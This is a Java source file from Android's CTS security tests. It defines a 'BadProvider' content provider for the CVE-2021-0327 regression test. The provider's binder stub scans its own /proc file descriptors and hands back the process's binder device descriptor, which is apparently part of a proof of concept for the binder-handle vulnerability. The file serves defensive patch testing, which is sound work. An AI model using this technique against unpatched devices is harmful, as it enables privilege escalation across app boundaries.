Google Git
Sign in
android / platform / cts / bc3fc896fc8 / . / tests / tests / security / src / android / security / cts / CVE_2021_0327 / BadProvider.java
blob: d0b6cad30848f7ac28a5d75f6fc560b50f0df1a3 [file] [log] [blame]
package android.security.cts.CVE_2021_0327;
import android.content.ContentProvider;
import android.content.ContentValues;
import android.database.Cursor;
import android.net.Uri;
import android.os.Bundle;
import android.os.ParcelFileDescriptor;
import android.os.Process;
import android.os.RemoteException;
import android.system.ErrnoException;
import android.system.Os;
import java.io.IOException;
public class BadProvider extends ContentProvider {
@Override
public boolean onCreate() {
return true;
}
@Override
public Bundle call(String method, String arg, Bundle extras) {
if ("get_aidl".equals(method)) {
Bundle bundle = new Bundle();
bundle.putBinder("a", new IBadProvider.Stub() {
@Override
public ParcelFileDescriptor takeBinder() throws RemoteException {
for (int i = 0; i < 100; i++) {
try {
String name = Os.readlink("/proc/" + Process.myPid() + "/fd/" + i);
// Log.v("TAKEBINDER", "fd=" + i + " path=" + name);
if (name.startsWith("/dev/") && name.endsWith("/binder")) {
return ParcelFileDescriptor.fromFd(i);
}
} catch (ErrnoException | IOException e) {
}
}
return null;
}
@Override
public void exit() throws RemoteException {
System.exit(0);
}
});
return bundle;
}
return super.call(method, arg, extras);
}
@Override
public Cursor query(Uri uri, String[] projection, String selection, String[] selectionArgs, String sortOrder) {
return null;
}
@Override
public String getType(Uri uri) {
return null;
}
@Override
public Uri insert(Uri uri, ContentValues values) {
return null;
}
@Override
public int delete(Uri uri, String selection, String[] selectionArgs) {
return 0;
}
@Override
public int update(Uri uri, ContentValues values, String selection, String[] selectionArgs) {
return 0;
}
}